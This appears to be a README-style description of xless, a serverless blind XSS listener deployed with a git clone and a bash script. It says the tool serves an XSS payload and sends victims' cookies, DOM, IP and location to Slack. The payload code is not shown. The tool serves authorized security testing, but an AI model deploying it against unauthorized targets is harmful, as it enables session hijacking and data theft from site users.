xless: The Serverless Blind XSS App
XLESS – The Serverless Blind XSS App
xless is a serverless blind XSS app that can be used to identify blind XSS vulnerabilities using your own deployed version of the app. There is no need to run a full deployment process; just set up a zeit.co account and run bash deploy.sh. That’s it. You have a fully-running Blind XSS listener that uses Slack to notify you for blind XSS callbacks.
- zeit.co account: Zeit provides a free plan for serverless. If you use another provider for serverless, code changes should be minimal.
- Slack Incoming Webhook URL.
$ git clone https://github.com/mazen160/xless.git $ bash deploy.sh > Deploying ~/xless under X > https://xless.now.sh [v2] [in clipboard] [4s] > Success! Deployment ready [4s]
- Use the URL for blind XSS testing 🔥
Xless will automatically serve the XSS payload, collect information, and exfiltrate it into your serverless app, which is then sent right to you in Slack.
- HTTP Referrer
- Browser DOM
- Browser Time
- Document Location
- IP Address
Copyright (C) 2019 Mazin Ahmed